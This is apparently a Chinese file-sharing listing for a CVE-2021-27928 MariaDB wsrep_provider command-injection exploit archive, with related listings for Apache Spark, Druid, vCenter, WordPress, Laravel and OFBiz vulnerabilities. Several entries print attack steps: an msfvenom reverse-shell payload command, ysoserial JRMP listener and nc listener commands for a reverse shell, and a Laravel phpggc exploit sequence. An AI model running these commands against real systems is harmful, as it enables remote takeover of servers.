Advertisement

CVE-2021-27928: MariaDB MySQL-wsrep 提供商命令注入漏洞...

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:ZIP


简介:
该简介描述的是一个针对MariaDB MySQL-wsrep插件的严重安全漏洞(CVE-2021-27928),允许远程攻击者通过精心构造的请求执行任意系统命令,对数据库系统的安全性构成重大威胁。此漏洞的存在使得黑客有机会控制服务器并访问敏感数据。建议用户尽快更新到最新版本以修复该问题。 Exploit Title: MariaDB 10.2 MySQL - wsrep_provider OS Command Execution Date: 03/18/2021 Exploit Author: Central InfoSec Versions Affected: - MariaDB 10.2 before 10.2.37 - MariaDB 10.3 before 10.3.28 - MariaDB 10.4 before 10.4.18 - MariaDB 10.5 before 10.5.9 Tested on: Linux CVE : CVE-2021-27928 如何利用: 步骤1:建立反向Shell有效负载 msfvenom -p linux/x64/shell LHOST=目标IP地址 LPORT=端口号 -f raw > payload.bin

全部评论 (0)

还没有任何评论哟~
客服
客服
  • CVE-2021-27928: MariaDB MySQL-wsrep ...
    优质
    该简介描述的是一个针对MariaDB MySQL-wsrep插件的严重安全漏洞(CVE-2021-27928),允许远程攻击者通过精心构造的请求执行任意系统命令,对数据库系统的安全性构成重大威胁。此漏洞的存在使得黑客有机会控制服务器并访问敏感数据。建议用户尽快更新到最新版本以修复该问题。 Exploit Title: MariaDB 10.2 MySQL - wsrep_provider OS Command Execution Date: 03/18/2021 Exploit Author: Central InfoSec Versions Affected: - MariaDB 10.2 before 10.2.37 - MariaDB 10.3 before 10.3.28 - MariaDB 10.4 before 10.4.18 - MariaDB 10.5 before 10.5.9 Tested on: Linux CVE : CVE-2021-27928 如何利用: 步骤1:建立反向Shell有效负载 msfvenom -p linux/x64/shell LHOST=目标IP地址 LPORT=端口号 -f raw > payload.bin
  • Apache Spark (CVE-2022-33891)格式化文档
    优质
    本文档详细解析了Apache Spark中的命令注入漏洞(CVE-2022-33891),提供了漏洞成因、影响范围及修复建议的全面分析,旨在帮助用户有效防范安全威胁。 Apache Spark 命令注入(CVE-2022-33891)格式化文档 Apache Spark 命令注入(CVE-2022-33891)漏洞复现 影响版本: - Apache spark version < 3.0.3 - 3.1.1 <= Apache spark 版本 < 3.1.2 - Apache Spark version >= 3.3.0 修复方案: 1. 建议升级到安全版本。 2. 在安全设备路径中添加黑名单或者增加WAF规则(临时方案)。
  • Apache Druid CVE-2021-25646执行复现.zip
    优质
    该资料包提供了关于Apache Druid中CVE-2021-25646漏洞的详细信息及其实验环境,帮助安全研究人员与开发人员理解和重现此高危命令执行漏洞。 Apache Druid 命令执行漏洞(CVE-2021-25646)复现学习笔记包括以下四部分内容:1. Apache Druid 命令执行漏洞(CVE-2021-25646)复现.pdf;2. apache-druid-0.20.0-bin.tar.gz;3. dns解析.txt;4. 反弹shell.txt。
  • CVE-2021-21972:针对CVE-2021-21972的利用
    优质
    该简介涉及的是对CVE-2021-21972的安全漏洞进行深入分析与利用的技术探讨,旨在提高系统安全性。 CVE-2021-21972影响VMware VCSA 6.7.0版本(8217866)及VIM 6.7.0版本(8217866)。同样,此漏洞也存在于VCSA 6.5.0版本(16613358)中。然而,对于vCenter 6.7 U2 和更高版本,在内存中运行的网站不受此Exploit的影响。 需要进一步测试的是vCenter 6.5 Linux (VCSA)和Windows版本、以及vCenter 6.7 Linux (VCSA)和Windows版本及vCenter 7.0 Linux (VCSA)和Windows版本。存在漏洞的具体接口为/ui/vropspluginui/rest/services/uploadova,完整路径是https://domain.com/ui/vropspluginui/r。 该问题允许任意文件上传。
  • Apache Druid CVE-2021-25646 PoC.py
    优质
    这段代码是针对Apache Druid中存在的CVE-2021-25646漏洞的PoC(Proof of Concept),旨在帮助安全研究人员验证系统是否受该漏洞影响。 CVE-2021-25646 是 Apache Druid 中的一个漏洞,这里提供了一个关于该漏洞的 PoC(Proof of Concept)代码文件名是 CVE-2021-25646-Apache Druid 漏洞 POC.py。
  • WordPress 5.8.3 的 CVE-2022-21661 SQL .pdf
    优质
    本PDF文档详细解析了WordPress 5.8.3版本中存在的CVE-2022-21661 SQL注入安全漏洞,包括漏洞原理、影响范围及修复建议。 最近爆出的 WordPress SQL 注入漏洞实际上并不是可以直接利用的漏洞,而是源于 WordPress 核心函数 WP_Query 的问题。由于这个函数常被插件使用,因此潜在的危害较大,并且可能影响到前台和后台。
  • Apache Spark (CVE-2022-33891) POC
    优质
    本POC探讨了Apache Spark中的命令注入漏洞(CVE-2022-33891),展示了该漏洞如何被利用,以及可能带来的安全风险。 Apache Spark 命令注入(CVE-2022-33891)POC 受影响的版本: - Apache spark version < 3.0.3 - 3.1.1 < Apache spark 版本 < 3.1.2 - Apache Spark version >= 3.3.0 修复方案: 1. 建议升级到安全版本。 2. 在安全设备路径中添加黑名单或者增加WAF规则(临时方案)。
  • Laravel Exploits: CVE-2021-3129 利用分析
    优质
    本文章详细解析了CVE-2021-3129漏洞在Laravel框架中的潜在威胁与影响,深入探讨其技术细节,并提供有效的防护措施和安全建议。 Laravel漏洞利用CVE-2021-3129的详细信息如下: 使用方法: ``` $ php -d phar.readonly=0 ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar ``` 日志文件:`/work/pentest/laravel/laravel/storage/logs/laravel.log` 清除日志信息 成功转换为PHAR! Phar反序列化完成
  • CVE-2021-26295: 成功利用CVE-2021-26295进行shell反弹攻击
    优质
    本文探讨了CVE-2021-26295漏洞,详细描述了如何通过此安全弱点实现远程代码执行,并成功实施了一次Shell反弹攻击。 CVE-2021-26295 EXP可成功反弹shell 本段落以及工具仅限于技术共享,不能用于非法用途,否则一切后果自行承担。 触发命令执行EXP的方法如下: 1. 在VPS上启动RMI监听端口9999: ``` java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 [要执行的命令] ``` 2. 在VPS上启动nc监听端口64444: ``` nc -lvp 64444 ``` 3. 执行python脚本: ``` python3 cve-2021-26295_exp.py ``` 示例:
  • Nmap脚本中的CVE-2021-21975检测
    优质
    本文介绍如何在Nmap脚本中利用特定工具和技术来检测CVE-2021-21975漏洞,提供网络安全专业人士实用指导。 CVE-2021-21975是一个与Nmap脚本检查相关的漏洞。可以使用以下命令进行检测: nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP